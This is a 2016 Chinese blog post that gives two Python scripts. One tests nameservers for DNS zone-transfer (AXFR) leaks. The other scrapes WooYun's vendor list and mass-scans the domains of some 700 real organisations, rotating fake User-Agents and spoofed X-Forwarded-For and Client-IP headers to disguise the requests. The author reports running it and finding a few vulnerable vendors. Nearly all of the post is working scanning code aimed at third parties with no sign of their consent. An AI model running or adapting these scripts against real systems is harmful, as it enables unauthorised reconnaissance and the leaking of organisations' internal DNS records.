小屿

DNS域传送漏洞python扫描全乌云厂商

2016-4-2 小屿 Python

看了下渗透导图，发现什么都不会，python渣需要多写就写了这个

单个验证脚本如下：

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import multiprocessing 

def bugscan(dns,domain):
    subdomain = os.popen("dig @%s %s axfr"%(dns,domain)).read()
    if subdomain.find('Transfer failed') == -1 and \
    subdomain.find('timed out') == -1 and \
    subdomain.find('not found') == -1 and \
    subdomain.find('XFR size') > 0 :
        print "testing...",dns,">>>发现漏洞<<<",subdomain
    else:
        print "testing...",dns,"没有发现漏洞"

def servers(domain):
    dig = os.popen("dig ns %s"%domain).read()
    dns_servers = re.findall(r'NS\t(.*?).\n', dig)
    print "正在扫描",domain
    pool = multiprocessing.Pool(processes=6)
    for dns in dns_servers:
        pool.apply_async(bugscan, (dns,domain))
    pool.close()
    pool.join()
    print '扫描结束!!!'

if __name__ == "__main__":
    print '-------------------\nDNS域传输漏洞扫描v0.1\n-------------------'
    domain = raw_input('please enter your domain without "http://"or"www":')
    servers(domain)

然后想扫乌云的全部厂商，又调用第一个脚本写了个

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import random
import re
import dns

UA = [{"description": "Internet Explorer 6", "useragent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
      {"description": "Internet Explorer 7", "useragent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"},
      {"description": "Internet Explorer 8", "useragent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"},
      {"description": "Googlebot 2.1", "useragent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
      {"description": "Msnbot 1.1", "useragent": "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"},
      {"description": "Yahoo Slurp", "useragent": "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"},
      {"description": "iPhone 3.0", "useragent": "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16"},
      {"description": "Internet Explorer 7 (Windows Vista)", "useragent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"},
      {"description": "Netscape 4.8 (Windows Vista)", "useragent": "Mozilla/4.8 [en] (Windows NT 6.0; U)"},
      {"description": "Opera 9.2 (Windows Vista)", "useragent": "Opera/9.20 (Windows NT 6.0; U; en)"},
      {"description": "MSIE 6 (Win XP)", "useragent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
      {"description": "MSIE 5.5 (Win 2000)", "useragent": "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )"},
      {"description": "MSIE 5.5 (Win ME)", "useragent": "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"},
      {"description": "Avant Browser 1.2", "useragent": "Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)"},
      {"description": "Opera 8.0 (Win 2000)", "useragent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0"},]

def ipTostr():
  Ip = '%d.%d.%d.%d' % (random.randint(1, 254), random.randint(0, 254), random.randint(0, 254), random.randint(1, 254))
  return Ip

for i in range(1,45):
  exp_url = "http://www.wooyun.org/corps/page/%s"%i
  headers = {'User-Agent': UA[random.randint(0, 14)]["useragent"] , 'Client-IP': '%s' % ipTostr(), 'X-Forwarded-For': '%s' % ipTostr()}
  response = requests.get(exp_url, headers=headers, timeout=15, verify=False)
  website = re.findall(r'nofollow" href="(?:http|https)://(.*?)" target', response.content)
  for web in website:
    domain = web.lstrip('www.').rstrip('/')
    dns.servers(domain)

扫完发现700多厂商就几个有这个问题。

标签: DNS域传送